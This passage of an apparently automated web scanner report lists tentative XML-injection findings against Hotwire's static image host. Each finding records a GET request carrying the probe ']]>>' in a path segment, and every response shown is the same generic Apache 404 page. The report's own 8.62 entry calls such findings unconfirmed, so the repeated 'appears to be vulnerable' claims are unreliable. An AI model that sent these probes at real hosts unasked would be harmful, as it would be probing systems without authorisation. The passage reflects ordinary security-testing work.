User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:47 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.62. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 5 (the path segment img_poi.png). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/core/map/img_poi.png]]>>?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:57 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.63. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/customer-care/blue_arrow_min.gif?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535977
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.64. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/customer-care/blue_arrow_min.gif?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535944
Date: Mon, 03 Oct 2011 01:02:28 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.65. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/customer-care]]>>/blue_arrow_min.gif?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:32 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.66. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/customer-care/blue_arrow_min.gif]]>>?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:34 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.67. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.68. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.69. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:01 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.70. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.71. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-bottom-and-left-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.72. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.73. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535987
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.74. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.75. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-bottom-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.76. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-right-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-bottom-right-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.77. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-left-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.78. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-left-side.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

